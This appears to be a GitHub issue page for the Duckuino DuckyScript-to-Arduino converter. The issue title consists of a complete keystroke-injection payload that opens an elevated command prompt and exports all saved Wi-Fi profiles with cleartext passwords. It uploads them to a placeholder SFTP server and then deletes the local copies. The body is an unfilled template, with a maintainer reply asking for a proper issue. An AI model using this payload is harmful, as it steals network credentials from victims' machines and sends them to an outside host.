Dukweeno / Duckuino

Simple DuckyScript to Arduino C converter.
https://dukweeno.github.io/Duckuino/
MIT License
353 stars 117 forks source link

DELAY 500 GUI r DELAY 300 STRING cmd DELAY 300 CTRL-SHIFT ENTER DELAY 300 LEFTARROW DELAY 100 ENTER DELAY 300 STRING cd C:\ ENTER DELAY 100 STRING md l ENTER DELAY 100 STRING cd l && @netsh wlan export profile key=clear >nul ENTER DELAY 1000 STRING sftp -oPort=22 **SFTPusername**@**SFTPserver** ENTER DELAY 1200 STRING **SFTPpassword** DELAY 70 ENTER DELAY 500 STRING cd wlan ENTER DELAY 50 STRING mput C:\l\*.xml ENTER DELAY 3000 STRING bye ENTER DELAY 200 STRING cd .. ENTER DELAY 50 STRING del "C:\l" ENTER DELAY 50 STRING j ENTER STRING exit ENTER #83

Closed Sh0tdown closed 5 years ago

Sh0tdown commented 5 years ago

Short introduction to your problem.

Input code:

REM The code your entered in the input text area

Output code:

/* The code outputted by the script, 'none' otherwise */

Error:

/* Any error outputted by the page or the console, 'none' otherwise */
lowlevl commented 5 years ago

Hi @Sh0tdown, can you create a proper issue by using the template please ? Thanks !